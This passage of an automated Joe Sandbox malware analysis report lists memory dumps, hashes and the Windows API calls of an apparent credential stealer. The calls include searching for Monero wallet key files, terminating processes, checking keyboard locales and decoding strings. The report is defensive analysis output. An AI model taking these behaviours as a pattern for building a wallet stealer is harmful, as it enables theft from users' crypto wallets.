                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: bc1d39af801164ae8128bf975736eb913f1c39b35102e77f24a80079292777b8
                                  • Instruction ID: 39fe92a08dbdd15dd59623adce130ae63184124f2a86786e532150dc5fe258fd
                                  • Opcode Fuzzy Hash: bc1d39af801164ae8128bf975736eb913f1c39b35102e77f24a80079292777b8
                                  • Instruction Fuzzy Hash: 8CF1DEB1925158EACB25EB64DCA9EEE7379BF14310F4045D9B00A620D1EF386BC8CF65
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007215A8,00720BAF), ref: 0070DBEB
                                  • StrCmpCA.SHLWAPI(?,007215AC), ref: 0070DC33
                                  • StrCmpCA.SHLWAPI(?,007215B0), ref: 0070DC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070DECC
                                  • FindClose.KERNEL32(000000FF), ref: 0070DEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 94183d014bfc000714f0c8b3da5222236316328fb0b9d86b75d53dd12728f4de
                                  • Instruction ID: 0b94a41b4fb037cb1d83822d15dd2ccd87a958141db303f370b1734b4e05e7b5
                                  • Opcode Fuzzy Hash: 94183d014bfc000714f0c8b3da5222236316328fb0b9d86b75d53dd12728f4de
                                  • Instruction Fuzzy Hash: EA916872A04204EBCB14FBB4ED5A9ED737DAF94300F008659F906561C1EE389B98CB92
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00719905
                                  • Process32First.KERNEL32(00709FDE,00000128), ref: 00719919
                                  • Process32Next.KERNEL32(00709FDE,00000128), ref: 0071992E
                                  • StrCmpCA.SHLWAPI(?,00709FDE), ref: 00719943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0071995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0071997A
                                  • CloseHandle.KERNEL32(00000000), ref: 00719987
                                  • CloseHandle.KERNEL32(00709FDE), ref: 00719993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: ca6463002e4eaf627c1f9d23d8df9f44f2a3163e4de14ecf3d772dc22244be4a
                                  • Instruction ID: 66a49a5682564e47b7c2158adb7c491cdca133fa76ba95787c5895416485e8fb
                                  • Opcode Fuzzy Hash: ca6463002e4eaf627c1f9d23d8df9f44f2a3163e4de14ecf3d772dc22244be4a
                                  • Instruction Fuzzy Hash: 93111F75959218ABCB24DFE4DC49BDDF778AB88700F00458DF605A6280E774AAC4DF90
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,007205B7), ref: 00717D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00717D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00717D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00717DF2
                                  • LocalFree.KERNEL32(00000000), ref: 00717EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: d0c187a96328cf856ff4ff7d1d71dccb3ef514f9994ceb1e0a323f59bacfc97c
                                  • Instruction ID: 9fe715e45ba28ab2ccb77c42c73020b769204a372a453e469a93b3b349d90c9e
                                  • Opcode Fuzzy Hash: d0c187a96328cf856ff4ff7d1d71dccb3ef514f9994ceb1e0a323f59bacfc97c
                                  • Instruction Fuzzy Hash: 74413BB1955218EBCB24DB98DC99BEEB374EB44700F1041D9E10A62191DB386FC8CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0j?$5`=$>)lw$Fa{$^kl$e8r$hw
                                  • API String ID: 0-2916595342
                                  • Opcode ID: fbbb63ecdc622474d0e3e1807a6a93701378f02496cceb9bd5b2912199296c10
                                  • Instruction ID: 2f8b5764a924230a76374cad7979f10745cba6147e315b76b10ec3af4a93170b
                                  • Opcode Fuzzy Hash: fbbb63ecdc622474d0e3e1807a6a93701378f02496cceb9bd5b2912199296c10
                                  • Instruction Fuzzy Hash: A9B239F3A082049FE304AE2DEC8567AF7E9EF94720F1A453DEAC5C3744E93558058697
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00720D79), ref: 0070E5A2
                                  • StrCmpCA.SHLWAPI(?,007215F0), ref: 0070E5F2
                                  • StrCmpCA.SHLWAPI(?,007215F4), ref: 0070E608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070ECDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 28b6e0038b660f9a22eb1284924cc1d855d2be787cb115be7b09ddec966e4483
                                  • Instruction ID: 68e081fc0e6cef5b0b304a46ee33849c53bc855b5186f4ccc84c9f6364719ceb
                                  • Opcode Fuzzy Hash: 28b6e0038b660f9a22eb1284924cc1d855d2be787cb115be7b09ddec966e4483
                                  • Instruction Fuzzy Hash: 2A124571A15118EBCB24FB64DCAAEED7379AF54310F4045D9B50A520D1EE386FC8CBA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 8ly{$EQm_$[q#&$w_n~$Or!$=[
                                  • API String ID: 0-3165474912
                                  • Opcode ID: 111070536e22c7ff6d6f3b8a28cf1c4bf40a06441d78fa367f558720f581b1d6
                                  • Instruction ID: 9112d7ff66b5fc54f1b58f4aaaa795939da7517be83d754121f4f4c5d7042236
                                  • Opcode Fuzzy Hash: 111070536e22c7ff6d6f3b8a28cf1c4bf40a06441d78fa367f558720f581b1d6
                                  • Instruction Fuzzy Hash: 00B24AF3A082149FE304AE2DDC8567AFBE5EFD4720F1A853DEAC583744E63598058693
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7qN>$JMlU$fU}$'~u$g[w$O
                                  • API String ID: 0-4039021827
                                  • Opcode ID: 9fa9ab71c475572cfeb1ec250d00d50dfd0657364c68952d1f86575371c2708f
                                  • Instruction ID: bb243bb6c8f6ece9d6c1de07910cc1b9180fb2ecb06383f78d4ed9474d4cf97d
                                  • Opcode Fuzzy Hash: 9fa9ab71c475572cfeb1ec250d00d50dfd0657364c68952d1f86575371c2708f
                                  • Instruction Fuzzy Hash: 6DB24AF3A082149FE3046E2DEC8567AFBE9EF94720F1A453DEAC4C3744E93598018696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 4yWC$;any$Rvz$zTeg${%ic$|,hR
                                  • API String ID: 0-1231020278
                                  • Opcode ID: d85ba3b68595705f90f1349e8a039dbf3357ecc43a2cf7129eeb41db822f680e
                                  • Instruction ID: ce128a3af33131954077d9008c5ce98014b5bdce0751cd2fbdfacac04043e967
                                  • Opcode Fuzzy Hash: d85ba3b68595705f90f1349e8a039dbf3357ecc43a2cf7129eeb41db822f680e
                                  • Instruction Fuzzy Hash: EDB2F6F360C204AFE3046E2DEC8567ABBE9EFD4720F1A493DEAC583740E63558158697
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00704F3E,00000000,?), ref: 0070A251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A27A
                                  • LocalFree.KERNEL32(?,?,?,?,00704F3E,00000000,?), ref: 0070A28F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: >Op
                                  • API String ID: 4291131564-4132451198
                                  • Opcode ID: 15f57ac73ad44e160b2a82dee46d0b59dc445762e88c3ae852ea6c13c2131112
                                  • Instruction ID: aff60c98080c7938812a3e669166a81d246daeccdb81b2e3f272ae4dfe1762ea
                                  • Opcode Fuzzy Hash: 15f57ac73ad44e160b2a82dee46d0b59dc445762e88c3ae852ea6c13c2131112
                                  • Instruction Fuzzy Hash: BA11C374245308EFEB10CFA4CC95FAA77B5FB88B04F208159FA159B2D0C776A941CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
